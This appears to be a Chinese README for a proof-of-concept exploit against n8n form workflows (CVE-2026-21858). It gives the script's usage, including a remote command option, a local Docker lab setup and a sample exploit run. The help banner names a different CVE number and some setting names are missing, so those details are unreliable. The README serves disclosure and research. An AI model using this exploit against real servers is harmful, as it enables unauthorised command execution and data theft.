n8n 是一个开源工作流自动化平台。从 1.65.0 到 1.121.0 之前的版本,攻击者可以通过执行某些基于表单的工作流来访问底层服务器上的文件。易受攻击的工作流可能授予未经身份验证的远程攻击者访问权限,导致系统上存储的敏感信息泄露,并可能根据部署配置和工作流使用情况实现进一步入侵。此问题已在 1.121.0 版本中修复。
https://nvd.nist.gov/vuln/detail/CVE-2026-21858
❯ python CVE-2026-21858.py -h
usage: CVE-2026-21858.py [-h] --command COMMAND form
PoC exploit: CVE-2026-1357
positional arguments:
form Target form URL
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
此 PoC 是针对一个精简的 n8n 工作流编写的,用于模拟简单的文件转换流程:

克隆仓库并创建一个易受攻击的 docker 实例:
mkdir n8n-data
sudo chown -R 1000:1000 n8n-data
docker-compose up -d
实例创建完成后,按照上方截图创建工作流。对于 Extract from File 步骤,您需要将 设置设为 ,以允许工作流完成。此外,在工具栏中将流程设置为 。
On ErrorContineActive创建流程后,安装依赖并启动漏洞利用:
pip install -r requirements.txt
python CVE-2026-21858.py http://localhost:5678/form/1d6de4f6-23dc-4163-ad39-a69252189d5e --command "uname -a"

本项目仅供教育和研究目的使用。作者不对因使用此代码而造成的滥用或损害负责。